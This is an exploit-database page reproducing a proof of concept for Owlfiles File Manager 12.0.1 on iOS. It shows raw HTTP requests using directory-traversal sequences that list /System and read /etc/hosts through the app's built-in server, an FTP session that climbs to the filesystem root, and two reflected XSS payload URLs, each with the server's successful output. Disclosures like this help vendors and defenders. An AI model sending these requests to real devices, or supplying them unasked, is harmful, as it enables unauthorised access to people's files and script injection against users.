Advertisement






Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion

CVE Category Price Severity
N/A CWE-200 N/A High
Author Risk Exploitation Type Date
N/A High Local 2022-09-20
CPE
cpe:cpe:/a:owlfiles:file_manager:12.0.1
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.59 96.376

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090054

Below is a copy:

Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion
# Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: Ios 16.0




###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: 192.168.8.101:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>


#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.8.101:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://192.168.8.101:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1             localhost



###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x     0 root wheel        256 Jan 01 1970 usr
drwxr-xr-x     0 root wheel        128 Jan 01 1970 bin
drwxr-xr-x     0 root wheel        608 Jan 01 1970 sbin
drwxr-xr-x     0 root wheel        224 Jan 01 1970 System
drwxr-xr-x     0 root wheel        640 Jan 01 1970 Library
drwxr-xr-x     0 root wheel        224 Jan 01 1970 private
drwxr-xr-x     0 root wheel       1131 Jan 01 1970 dev
drwxr-xr-x     0 root admin       4512 Jan 01 1970 Applications
drwxr-xr-x     0 root admin         64 Jan 01 1970 Developer
drwxr-xr-x     0 root admin         64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>

#############
XSS on HTTP built-in server
#############

poc 1:

http://192.168.8.101:8080/download?path=<script>alert(rose)</script>

poc 2:

http://192.168.8.101:8080/list?path=<script>alert(rose)</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.